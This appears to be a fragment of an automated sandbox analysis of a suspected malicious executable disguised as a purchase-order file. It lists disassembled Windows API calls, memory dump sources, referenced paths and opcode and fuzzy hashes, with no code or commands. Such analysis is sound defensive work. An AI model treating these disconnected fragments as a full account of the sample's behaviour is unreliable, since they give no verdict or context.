                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                      • String ID:
                                                                      • API String ID: 3748168415-3916222277
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,75573410,00000000,C:\Users\user\AppData\Local\Temp\,004035CF,004033E9,?), ref: 00403611
                                                                      • GlobalFree.KERNEL32(00B719E8), ref: 00403618
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004035F7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Free$GlobalLibrary
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 1100898210-4083868402
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe,C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe,80000000,00000003), ref: 004057CB
                                                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe,C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe,80000000,00000003), ref: 004057D9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrlen
                                                                      • String ID: C:\Users\user\Desktop
                                                                      • API String ID: 2709904686-1876063424
                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                      • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                      • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2632503904.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.2632485014.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000000.00000002.2632520015.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000000.00000002.2632534659.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 1780285237-0
                                                                      • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                      • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                      • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                      • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058F4
                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040590C
                                                                      • CharNextA.USER32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040591D
                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405926
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 190613189-0
                                                                      • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                      • Instruction ID: 7adaab352aa717b916c044831a99f4991ef712c09a2c9b56ba9fed1a583d178e
                                                                      • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                      • Instruction Fuzzy Hash: 43F09636505518FFC7129FA5DC0099EBBB8EF16360B2540B9F801F7360D674EE019BA9